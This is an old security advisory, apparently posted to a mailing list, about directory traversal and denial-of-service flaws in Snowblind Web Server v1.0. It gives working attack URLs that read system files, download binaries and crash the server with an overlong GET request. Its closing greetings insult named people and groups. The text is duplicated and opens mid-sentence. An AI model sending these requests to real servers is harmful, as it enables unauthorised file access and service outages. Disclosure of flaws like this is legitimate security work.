this request will download program file calc.exe with
name internal.sws
http://hostname/internal.sws?sws.exe
download webserver itself )).
3. directory listing out of webroot.
note: this bug will works if only `Allow directory
listings' is turned on [ in default its do ].
http://hostname/.../
will print contents of root directory on that disk
drive.
Denial of Service
-----------------
1. this url will crash webserver:
http://localhost/</
2. if you send GET request, that contains more >=219
charakterz, then you will crash the server..
request example:
GET /fff[ x 129 ]ffff HTTP/1.0
shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru,
N0b0d13s Team and all russian security guyz!!
to kate especially ))
hates: slavomira and other dirty ppl in *.kz $#%&^!
k0dsweb lamers team == yeah, i really __HATE__ yours!!
================
im not a lame,
not yet a hacker
================
topic: Snowblind Web Server: multiple issues
product: Snowblind Web Server v1.0
vendor: www.snowblind.net
risk: high
date: 05/16/2k3
tested platform: Windows 98 Second Edition
discovered by: euronymous /F0KP
advisory urls: http://f0kp.iplus.ru/bz/022.en.txt
http://f0kp.iplus.ru/bz/022.ru.txt
contact email: euronymous (at) iplus (dot) ru [email concealed]
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
description
-----------
i have found couple issues in this http-server. they
are: directory traversal and DoS attacks.
directory traversal
-------------------
1. you can read and download any file out of webroot:
http://hostname/../../windows/system.ini
or
http://hostname/internal.sws?../../windows/system.ini
2. also you can download any binary file in this manner:
http://hostname/internal.sws?../../windows/calc.exe
this request will download program file calc.exe with
name internal.sws
http://hostname/internal.sws?sws.exe
download webserver itself )).
3. directory listing out of webroot.
note: this bug will works if only `Allow directory
listings' is turned on [ in default its do ].
http://hostname/.../
will print contents of root directory on that disk
drive.
Denial of Service
-----------------
1. this url will crash webserver:
http://localhost/</
2. if you send GET request, that contains more >=219
charakterz, then you will crash the server..
request example:
GET /fff[ x 129 ]ffff HTTP/1.0
shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru,
N0b0d13s Team and all russian security guyz!!
to kate especially ))
hates: slavomira and other dirty ppl in *.kz $#%&^!
k0dsweb lamers team == yeah, i really __HATE__ yours!!
================
im not a lame,
not yet a hacker
================
[ reply ]